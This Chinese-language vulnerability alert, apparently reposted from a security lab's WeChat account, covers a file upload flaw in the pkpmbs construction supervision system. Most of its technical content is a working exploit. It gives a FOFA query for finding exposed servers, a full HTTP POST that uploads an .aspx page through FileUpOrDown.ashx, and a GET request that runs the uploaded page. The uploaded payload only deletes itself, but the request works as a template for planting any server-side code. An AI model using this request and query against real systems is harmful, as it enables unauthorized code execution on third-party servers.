漏洞预警 pkpmbs 工程监督系统 fileupordown文件上传漏洞

admin

102705
文章

87
评论

2024年4月19日02:41:11评论25 views字数 956阅读3分11秒阅读模式

0x02 漏洞描述

pkpmbs 工程监督系统 fileupordown处存在文件上传漏洞。

漏洞预警 pkpmbs 工程监督系统 fileupordown文件上传漏洞

0x03 漏洞复现

fofa-qeury: body="/Content/Theme/Standard/"

1.执行poc进行文件上传，访问文件得到结果

- |    POST /Applications/Forms/SearchSetting/FileUpOrDown.ashx?operation=Fileupload&extName=.aspx&&searchConfigName=5B56bf.aspx HTTP/1.1  Host:   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqACRhAMBHmQQAUP  User-Agent: Mozilla/5.0   ------WebKitFormBoundarybqACRhAMBHmQQAUP  Content-Disposition: form-data; name="Filedata"; filename="1.aspx"  Content-Type: image/png  e165421110ba03099a1c0393373c5b43  <%@ Page Language="C#" Debug="true" %>  <%@ import Namespace="System"%>  <%@ import Namespace="System.IO"%>  <% string pageName = Request.PhysicalPath;%>  <% File.Delete(pageName);%>  ------WebKitFormBoundarybqACRhAMBHmQQAUP--- |    GET /Excel/Templete/5B56bf.aspx HTTP/1.1  Host:

原文始发于微信公众号（融云攻防实验室）：漏洞预警 pkpmbs 工程监督系统 fileupordown文件上传漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞预警 pkpmbs 工程监督系统 fileupordown文件上传漏洞

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

【0day】KingPortal运行系统信息泄露漏洞【未公开|附poc】

LiveGBS user/save存在逻辑缺陷漏洞(CNVD-2023-72138)

Cisco IOS XE Web UI存在权限提升漏洞(CVE-2023-20198)

YzmCMS pay_callback.html存在远程命令执行漏洞

发表评论

在线咨询

微信